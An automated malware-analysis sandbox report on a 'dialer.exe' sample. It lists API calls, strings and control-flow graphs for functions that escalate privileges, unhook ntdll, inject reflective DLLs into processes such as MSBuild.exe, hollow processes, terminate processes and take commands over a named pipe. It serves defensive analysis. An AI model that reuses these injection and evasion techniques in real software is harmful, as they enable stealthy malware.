                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: ntdll.dll
                        • API String ID: 1646373207-2227199552
                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                        Execution Graph

                        Execution Coverage:18.4%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:214
                        Total number of Limit Nodes:5
                        execution_graph 436 140002524 437 140002531 436->437 438 140002539 436->438 440 1400010c0 437->440 478 1400018ac OpenProcess 440->478 443 1400014ba 443->438 444 140001122 OpenProcess 444->443 445 14000113e OpenProcess 444->445 446 140001161 K32GetModuleFileNameExW 445->446 447 1400011fd NtQueryInformationProcess 445->447 448 1400011aa CloseHandle 446->448 449 14000117a PathFindFileNameW lstrlenW 446->449 450 1400014b1 CloseHandle 447->450 451 140001224 447->451 448->447 453 1400011b8 448->453 449->448 452 140001197 StrCpyW 449->452 450->443 451->450 454 140001230 OpenProcessToken 451->454 452->448 453->447 456 1400011d8 StrCmpIW 453->456 454->450 455 14000124e GetTokenInformation 454->455 457 1400012f1 455->457 458 140001276 GetLastError 455->458 456->450 456->453 460 1400012f8 CloseHandle 457->460 458->457 459 140001281 LocalAlloc 458->459 459->457 461 140001297 GetTokenInformation 459->461 460->450 465 14000130c 460->465 462 1400012df 461->462 463 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 461->463 464 1400012e6 LocalFree 462->464 463->464 464->460 465->450 466 14000139b StrStrA 465->466 467 1400013c3 465->467 466->465 468 1400013c8 466->468 467->450 468->450 469 1400013f3 VirtualAllocEx 468->469 469->450 470 140001420 WriteProcessMemory 469->470 470->450 471 14000143b 470->471 483 14000211c 471->483 479 14000110e 478->479 480 1400018d8 IsWow64Process 478->480 479->443 479->444 481 1400018f8 CloseHandle 480->481 482 1400018ea 480->482 481->479 482->481 486 140001914 GetModuleHandleA 483->486 487 140001934 GetProcAddress 486->487 488 14000193d 486->488 487->488 382 140002258 385 14000226c 382->385 409 140001f2c 385->409 388 140001f2c 14 API calls 389 14000228f GetCurrentProcessId OpenProcess 388->389 390 140002321 FindResourceExA 389->390 391 1400022af OpenProcessToken 389->391 394 140002341 SizeofResource 390->394 395 140002261 ExitProcess 390->395 392 1400022c3 LookupPrivilegeValueW 391->392 393 140002318 CloseHandle 391->393 392->393 396 1400022da AdjustTokenPrivileges 392->396 393->390 394->395 397 14000235a LoadResource 394->397 396->393 398 140002312 GetLastError 396->398 397->395 399 14000236e LockResource GetCurrentProcessId 397->399 398->393 423 1400017ec GetProcessHeap HeapAlloc 399->423 410 140001f35 StrCpyW StrCatW GetModuleHandleW 409->410 411 1400020ff 409->411 410->411 412 140001f86 GetCurrentProcess K32GetModuleInformation 410->412 411->388 413 1400020f6 FreeLibrary 412->413 414 140001fb6 CreateFileW 412->414 413->411 414->413 415 140001feb CreateFileMappingW 414->415 416 140002014 MapViewOfFile 415->416 417 1400020ed CloseHandle 415->417 418 1400020e4 CloseHandle 416->418 419 140002037 416->419 417->413 418->417 419->418 420 140002050 lstrcmpiA 419->420 422 14000208e 419->422 420->419 421 140002090 VirtualProtect VirtualProtect 420->421 421->418 422->418 429 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 423->429 425 140001885 GetProcessHeap HeapFree 426 140001830 426->425 427 140001851 OpenProcess 426->427 427->426 428 140001867 TerminateProcess CloseHandle 427->428 428->426 430 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 429->430 433 140001565 429->433 430->426 431 14000157a OpenProcess 432 140001597 K32EnumProcessModules 431->432 431->433 432->433 434 14000161a CloseHandle 432->434 433->430 433->431 433->434 435 1400015c9 ReadProcessMemory 433->435 434->433 435->433 489 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 490 140002b8e K32EnumProcesses 489->490 491 140002beb Sleep 490->491 492 140002ba3 490->492 491->490 492->491 493 140002bf8 494 140002c05 493->494 496 140002c25 ConnectNamedPipe 494->496 497 140002c1a Sleep 494->497 503 140001b54 AllocateAndInitializeSid 494->503 498 140002c83 Sleep 496->498 499 140002c34 ReadFile 496->499 497->494 501 140002c8e DisconnectNamedPipe 498->501 500 140002c57 WriteFile 499->500 499->501 500->501 501->496 504 140001bb1 SetEntriesInAclW 503->504 505 140001c6f 503->505 504->505 506 140001bf5 LocalAlloc 504->506 505->494 506->505 507 140001c09 InitializeSecurityDescriptor 506->507 507->505 508 140001c19 SetSecurityDescriptorDacl 507->508 508->505 509 140001c30 CreateNamedPipeW 508->509 509->505 510 140002540 511 140002558 510->511 512 14000254d 510->512 513 1400010c0 30 API calls 512->513 513->511 514 1400021d0 515 1400021dd 514->515 516 140001b54 6 API calls 515->516 517 1400021f2 Sleep 515->517 518 1400021fd ConnectNamedPipe 515->518 516->515 517->515 519 140002241 Sleep 518->519 520 14000220c ReadFile 518->520 521 14000224c DisconnectNamedPipe 519->521 520->521 522 14000222f 520->522 521->518 522->521 523 140002560 524 140002592 523->524 525 14000273a 523->525 526 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 524->526 527 140002598 524->527 528 140002748 525->528 529 14000297e ReadFile 525->529 530 140002633 526->530 532 140002704 526->532 533 1400025a5 527->533 534 1400026bd ExitProcess 527->534 535 140002751 528->535 536 140002974 528->536 529->530 531 1400029a8 529->531 531->530 544 1400018ac 3 API calls 531->544 532->530 546 1400010c0 30 API calls 532->546 540 1400025ae 533->540 541 140002660 RegOpenKeyExW 533->541 537 140002919 535->537 538 14000275c 535->538 539 14000175c 22 API calls 536->539 545 140001944 ReadFile 537->545 542 140002761 538->542 543 14000279d 538->543 539->530 540->530 556 1400025cb ReadFile 540->556 547 1400026a1 541->547 548 14000268d RegDeleteValueW 541->548 542->530 605 14000217c 542->605 608 140001944 543->608 549 1400029c7 544->549 551 140002928 545->551 546->532 592 1400019c4 SysAllocString SysAllocString CoInitializeEx 547->592 548->547 549->530 560 1400029db GetProcessHeap HeapAlloc 549->560 561 140002638 549->561 551->530 563 140001944 ReadFile 551->563 555 1400026a6 600 14000175c GetProcessHeap HeapAlloc 555->600 556->530 558 1400025f5 556->558 558->530 570 1400018ac 3 API calls 558->570 566 1400014d8 13 API calls 560->566 572 140002a90 4 API calls 561->572 562 1400027b4 ReadFile 562->530 567 1400027dc 562->567 568 14000293f 563->568 583 140002a14 566->583 567->530 573 1400027e9 GetProcessHeap HeapAlloc ReadFile 567->573 568->530 574 140002947 ShellExecuteW 568->574 576 140002614 570->576 572->530 578 14000290b GetProcessHeap 573->578 579 14000282d 573->579 574->530 576->530 576->561 582 140002624 576->582 577 140002a49 GetProcessHeap 580 140002a52 HeapFree 577->580 578->580 579->578 584 140002881 lstrlenW GetProcessHeap HeapAlloc 579->584 585 14000285e 579->585 580->530 586 1400010c0 30 API calls 582->586 583->577 632 1400016cc 583->632 626 140002a90 CreateFileW 584->626 585->578 612 140001c88 585->612 586->530 593 140001a11 CoInitializeSecurity 592->593 594 140001b2c SysFreeString SysFreeString 592->594 595 140001a59 CoCreateInstance 593->595 596 140001a4d 593->596 594->555 597 140001b26 CoUninitialize 595->597 598 140001a88 VariantInit 595->598 596->595 596->597 597->594 599 140001ade 598->599 599->597 601 1400014d8 13 API calls 600->601 603 14000179a 601->603 602 1400017c8 GetProcessHeap HeapFree 603->602 604 1400016cc 5 API calls 603->604 604->603 606 140001914 2 API calls 605->606 607 140002191 606->607 609 140001968 ReadFile 608->609 610 14000198b 609->610 611 1400019a5 609->611 610->609 610->611 611->530 611->562 618 140001cbb 612->618 613 140001cce CreateProcessW 614 140001d2b VirtualAllocEx 613->614 613->618 616 140001d60 WriteProcessMemory 614->616 614->618 615 140001e97 615->578 616->618 617 140001e62 OpenProcess 617->618 619 140001e78 TerminateProcess 617->619 618->613 618->615 618->617 620 140001dd2 VirtualAlloc 618->620 622 140001d8c WriteProcessMemory 618->622 619->618 620->618 621 140001df1 GetThreadContext 620->621 621->618 623 140001e09 WriteProcessMemory 621->623 622->618 623->618 624 140001e30 SetThreadContext 623->624 624->618 625 140001e4e ResumeThread 624->625 625->615 625->618 627 1400028f7 GetProcessHeap HeapFree 626->627 628 140002ada WriteFile 626->628 627->578 629 140002b1c CloseHandle 628->629 630 140002afe 628->630 629->627 630->629 631 140002b02 WriteFile 630->631 631->629 633 140001745 632->633 634 1400016eb OpenProcess 632->634 633->577 634->633 635 140001703 634->635 636 14000211c 2 API calls 635->636 637 140001723 636->637 638 14000173c CloseHandle 637->638 639 140001731 CloseHandle 637->639 638->633 639->638

                        Callgraph

                        Executed Functions

                        Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                        • API String ID: 4177739653-1130149537
                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                        Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                        • String ID:
                        • API String ID: 4084875642-0
                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                        Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                        • String ID: .text$C:\Windows\System32\
                        • API String ID: 2721474350-832442975
                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                        Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                          • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                        • OpenProcess.KERNEL32 ref: 0000000140001859
                        • TerminateProcess.KERNEL32 ref: 000000014000186C
                        • CloseHandle.KERNEL32 ref: 0000000140001875
                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                        • String ID:
                        • API String ID: 1323846700-0
                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                        Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 67 140002258-14000225c call 14000226c 69 140002261-140002263 ExitProcess 67->69
                        APIs
                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                          • Part of subcall function 000000014000226C: RegCreateKeyExW.ADVAPI32 ref: 00000001400023BE
                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                          • Part of subcall function 000000014000226C: RegSetKeySecurity.ADVAPI32 ref: 00000001400023FE
                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                        • ExitProcess.KERNEL32 ref: 0000000140002263
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                        • String ID:
                        • API String ID: 3836936051-0
                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                        Non-executed Functions

                        Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 70 1400010c0-140001110 call 1400018ac 73 140001116-14000111c 70->73 74 1400014ba-1400014d6 70->74 73->74 75 140001122-140001138 OpenProcess 73->75 75->74 76 14000113e-14000115b OpenProcess 75->76 77 140001161-140001178 K32GetModuleFileNameExW 76->77 78 1400011fd-14000121e NtQueryInformationProcess 76->78 79 1400011aa-1400011b6 CloseHandle 77->79 80 14000117a-140001195 PathFindFileNameW lstrlenW 77->80 81 1400014b1-1400014b4 CloseHandle 78->81 82 140001224-14000122a 78->82 79->78 84 1400011b8-1400011d3 79->84 80->79 83 140001197-1400011a7 StrCpyW 80->83 81->74 82->81 85 140001230-140001248 OpenProcessToken 82->85 83->79 87 1400011d8-1400011ea StrCmpIW 84->87 85->81 86 14000124e-140001274 GetTokenInformation 85->86 88 1400012f1 86->88 89 140001276-14000127f GetLastError 86->89 87->81 90 1400011f0-1400011fb 87->90 92 1400012f8-140001306 CloseHandle 88->92 89->88 91 140001281-140001295 LocalAlloc 89->91 90->78 90->87 91->88 93 140001297-1400012bd GetTokenInformation 91->93 92->81 94 14000130c-140001313 92->94 95 1400012df 93->95 96 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 93->96 94->81 97 140001319-140001324 94->97 98 1400012e6-1400012ef LocalFree 95->98 96->98 97->81 99 14000132a-140001334 97->99 98->92 99->81 100 14000133a-140001344 99->100 100->81 101 14000134a-14000138a call 140001ec4 * 3 100->101 101->81 108 140001390-1400013b0 call 140001ec4 StrStrA 101->108 111 1400013b2-1400013c1 108->111 112 1400013c8-1400013ed call 140001ec4 * 2 108->112 111->108 113 1400013c3 111->113 112->81 118 1400013f3-14000141a VirtualAllocEx 112->118 113->81 118->81 119 140001420-140001439 WriteProcessMemory 118->119 119->81 120 14000143b-14000145d call 14000211c 119->120 120->81 123 14000145f-140001467 120->123 123->81 124 140001469-14000146f 123->124 125 140001471-140001476 124->125 126 140001478-140001485 WaitForSingleObject 124->126 127 1400014ab CloseHandle 125->127 128 1400014a6 126->128 129 140001487-14000149b GetExitCodeThread 126->129 127->81 128->127 129->128 130 14000149d-1400014a3 129->130 130->128
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                        • API String ID: 2561231171-3753927220
                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                        Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 131 140002560-14000258c 132 140002592 131->132 133 14000273a-140002742 131->133 134 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 132->134 135 140002598-14000259f 132->135 136 140002748-14000274b 133->136 137 14000297e-1400029a2 ReadFile 133->137 138 140002a74-140002a8e 134->138 140 140002704-140002715 134->140 141 1400025a5-1400025a8 135->141 142 1400026bd-1400026bf ExitProcess 135->142 143 140002751-140002756 136->143 144 140002974-140002979 call 14000175c 136->144 137->138 139 1400029a8-1400029af 137->139 139->138 148 1400029b5-1400029c9 call 1400018ac 139->148 140->138 149 14000271b-140002733 call 1400010c0 140->149 150 1400025ae-1400025b1 141->150 151 140002660-14000268b RegOpenKeyExW 141->151 145 140002919-14000292c call 140001944 143->145 146 14000275c-14000275f 143->146 144->138 145->138 173 140002932-140002941 call 140001944 145->173 152 140002761-140002766 146->152 153 14000279d-1400027ae call 140001944 146->153 148->138 171 1400029cf-1400029d5 148->171 174 140002735 149->174 160 140002651-14000265b 150->160 161 1400025b7-1400025ba 150->161 158 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 151->158 159 14000268d-14000269b RegDeleteValueW 151->159 152->138 162 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 152->162 153->138 182 1400027b4-1400027d6 ReadFile 153->182 158->138 159->158 160->138 168 140002644-14000264c 161->168 169 1400025c0-1400025c5 161->169 168->138 169->138 176 1400025cb-1400025ef ReadFile 169->176 180 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 171->180 181 140002a5f 171->181 173->138 197 140002947-14000296f ShellExecuteW 173->197 174->138 176->138 178 1400025f5-1400025fc 176->178 178->138 185 140002602-140002616 call 1400018ac 178->185 200 140002a18-140002a1e 180->200 201 140002a49-140002a4f GetProcessHeap 180->201 187 140002a66-140002a6f call 140002a90 181->187 182->138 189 1400027dc-1400027e3 182->189 185->138 206 14000261c-140002622 185->206 187->138 189->138 196 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 189->196 202 14000290b-140002914 GetProcessHeap 196->202 203 14000282d-140002839 196->203 197->138 200->201 207 140002a20-140002a32 200->207 204 140002a52-140002a5d HeapFree 201->204 202->204 203->202 208 14000283f-14000284b 203->208 204->138 210 140002624-140002633 call 1400010c0 206->210 211 140002638-14000263f 206->211 212 140002a34-140002a36 207->212 213 140002a38-140002a40 207->213 208->202 214 140002851-14000285c 208->214 210->138 211->187 212->213 218 140002a44 call 1400016cc 212->218 213->201 219 140002a42 213->219 215 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 214->215 216 14000285e-140002869 214->216 215->202 216->202 220 14000286f-14000287c call 140001c88 216->220 218->201 219->207 220->202
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000034.00000002.1523702282.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 00000034.00000002.1523442491.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523833512.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 00000034.00000002.1523924608.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_52_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                        • String ID: SOFTWARE$dialerstager$open
                        • API String ID: 3276259517-3931493855
                        • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                        • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                        Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
